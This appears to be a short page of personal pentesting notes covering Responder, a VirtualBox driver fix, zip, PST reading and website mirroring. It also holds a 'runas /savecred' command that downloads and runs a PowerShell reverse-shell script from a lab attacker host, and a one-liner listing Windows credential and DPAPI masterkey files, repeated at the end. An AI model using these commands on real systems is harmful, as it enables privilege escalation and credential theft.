Basic tips/scripts

Bypass Responder errors

"/usr/share/responder/./Responder.py:366: DeprecationWarning: setDaemon() is deprecated, set the daemon attribute instead"

Use python3.9 version!
:> sudo python3.9 /usr/share/responder/Responder.py -I eth0

Windows 11 is not listing a bridged adapter for VirtualBox

Open windows start button.
Search for: network.
Choose: View network connections via the control panel.
Right click your primary connection (for me it was just Ethernet since I'm on a wired connection).
Select: Properties.
Click: Install....
Select: Service.
Click: Add....
Click: Have Disk....
Click: Browse.
Navigate to the associated virtualbox install location for your given drive. For example mine was: C:\Program Files\Oracle\VirtualBox\drivers\network\netlwf.
Select the file: VBoxNetLwf.inf in the above directory.
Click: OK.
Select: VirtualBox NDIS6 Bridged Networking Driver.
Click: OK.

File compressing with exception

zip -r files/temp/images.zip * -x "files/*" "*.jpg" "*.png" "*.gif" "*.jpeg" "*.wmv" "*.pdf" "*.wma" "files/imagenes/look*"

Open PST files - Linux

readpst -tea -m Access\ Control.pst

Download everything from a website

wget --limit-rate=200k --no-clobber --convert-links --random-wait -r -l 50 -p -E -e robots=off -U mozilla http://xxxxxx

Exploiting "runas /savecred"

The following command is used to start a PowerShell reverse shell as ACCESS\Administrator.

runas /user:ACCESS\Administrator /savecred "powershell -c IEX (New-Object
Net.Webclient).downloadstring('http://10.10.14.2/admin.ps1')"

Extract credentials Windows

The following "one-liner" will identify the available credential files and masterkeys.

cmd /c " dir /S /AS C:\Users\security\AppData\Local\Microsoft\Vault & dir /S /AS
C:\Users\security\AppData\Local\Microsoft\Credentials & dir /S /AS
C:\Users\security\AppData\Local\Microsoft\Protect & dir /S /AS
C:\Users\security\AppData\Roaming\Microsoft\Vault & dir /S /AS
C:\Users\security\AppData\Roaming\Microsoft\Credentials & dir /S /AS
C:\Users\security\AppData\Roaming\Microsoft\Protect"

PreviousStuff NextOpenBSD & NetBSD

Last updated 2 years ago

cmd /c " dir /S /AS C:\Users\security\AppData\Local\Microsoft\Vault & dir /S /AS C:\Users\security\AppData\Local\Microsoft\Credentials & dir /S /AS C:\Users\security\AppData\Local\Microsoft\Protect & dir /S /AS C:\Users\security\AppData\Roaming\Microsoft\Vault & dir /S /AS C:\Users\security\AppData\Roaming\Microsoft\Credentials & dir /S /AS C:\Users\security\AppData\Roaming\Microsoft\Protect"